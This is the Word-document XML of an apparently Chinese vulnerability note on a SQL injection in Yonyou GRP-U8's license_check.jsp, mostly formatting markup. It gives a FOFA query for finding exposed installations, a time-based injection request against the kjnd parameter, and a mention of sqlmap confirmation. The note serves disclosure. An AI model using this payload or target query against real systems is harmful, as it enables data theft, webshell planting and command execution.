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用友 GRP-U8 license_check.jsp 存在sql注入</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="5"/>
          <w:rFonts w:ascii="Microsoft YaHei UI" w:hAnsi="Microsoft YaHei UI" w:eastAsia="Microsoft YaHei UI" w:cs="Microsoft YaHei UI"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="3DA742"/>
          <w:spacing w:val="6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ascii="Microsoft YaHei UI" w:hAnsi="Microsoft YaHei UI" w:eastAsia="Microsoft YaHei UI" w:cs="Microsoft YaHei UI"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="3DA742"/>
          <w:spacing w:val="6"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:bdr w:val="none" w:color="auto" w:sz="0" w:space="0"/>
          <w:shd w:val="clear" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>0x01漏洞描述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shd w:val="clear" w:fill="FFFFFF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shd w:val="clear" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>用友 GRP-U8 license_check.jsp 存在sql注入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bdr w:val="none" w:color="auto" w:sz="0" w:space="0"/>
          <w:shd w:val="clear" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>，攻击者可利用该漏洞执行任意SQL语句，如查询数据、下载数据、写入webshell、执行系统命令以及绕过登录限制等。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="5"/>
          <w:rFonts w:ascii="Microsoft YaHei UI" w:hAnsi="Microsoft YaHei UI" w:eastAsia="Microsoft YaHei UI" w:cs="Microsoft YaHei UI"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="3DA742"/>
          <w:spacing w:val="6"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:bdr w:val="none" w:color="auto" w:sz="0" w:space="0"/>
          <w:shd w:val="clear" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="5"/>
          <w:rFonts w:ascii="Microsoft YaHei UI" w:hAnsi="Microsoft YaHei UI" w:eastAsia="Microsoft YaHei UI" w:cs="Microsoft YaHei UI"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="3DA742"/>
          <w:spacing w:val="6"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:bdr w:val="none" w:color="auto" w:sz="0" w:space="0"/>
          <w:shd w:val="clear" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>0x02漏洞复现</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr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shd w:val="clear" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>fofa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7"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16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16"/>
          <w:szCs w:val="16"/>
          <w:bdr w:val="none" w:color="auto" w:sz="0" w:space="0"/>
        </w:rPr>
        <w:t>app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7"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16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7"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:bdr w:val="none" w:color="auto" w:sz="0" w:space="0"/>
        </w:rPr>
        <w:t>"用友-GRP-U8"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3360" cy="2162810"/>
            <wp:effectExtent l="0" t="0" r="1016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7"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>部分界面如下</w:t>
      </w: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0025" cy="2591435"/>
            <wp:effectExtent l="0" t="0" r="8255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ind w:left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/u8qx/license_check.jsp?kjnd=1';WAITFOR%20DELAY%20'0:0:3'--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2266315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sqlmap验证如下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1935" cy="2783840"/>
            <wp:effectExtent l="0" t="0" r="1206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93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1832AD"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="DE1832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537D5154"/>
    <w:rsid w:val="7DA7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225</Characters>
  <Lines>0</Lines>
  <Paragraphs>0</Paragraphs>
  <TotalTime>0</TotalTime>
  <ScaleCrop>false</ScaleCrop>
  <LinksUpToDate>false</LinksUpToDate>
  <CharactersWithSpaces>232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2023-10-23T03:46:15Z</dcterms:created>
  <dc:creator>wll</dc:creator>
  <cp:lastModifiedBy>----末悲</cp:lastModifiedBy>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2023-10-23T03:49:14Z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BC31FB12BD5A404E89B381E4004AE0CD_12</vt:lpwstr>
  </property>
</Properties>
</file>